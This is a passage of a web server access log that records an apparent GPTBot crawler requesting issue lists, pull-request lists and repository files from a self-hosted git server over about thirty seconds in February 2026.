"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:22:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:22:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:22:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:23:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:23:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:23:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:23:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:23:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:23:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:23:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:23:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:23:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:23:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:23:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10250] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv?display=rendered" [Client 74.7.227.38] [Length 11217] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:19:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js?display=rendered" [Client 74.7.227.38] [Length 11202] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:19:23:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate?display=rendered" [Client 74.7.227.38] [Length 11195] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:19:23:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:19:23:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:19:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11168] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:19:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72911] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=nearduedate&state=open&type=all" -[17/Feb/2026:19:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate?display=source" [Client 74.7.227.38] [Length 13216] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:19:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python?display=rendered" [Client 74.7.227.38] [Length 11216] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:19:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn?display=rendered" [Client 74.7.227.38] [Length 11215] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:19:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets?display=source" [Client 74.7.227.38] [Length 11779] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:19:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10193] 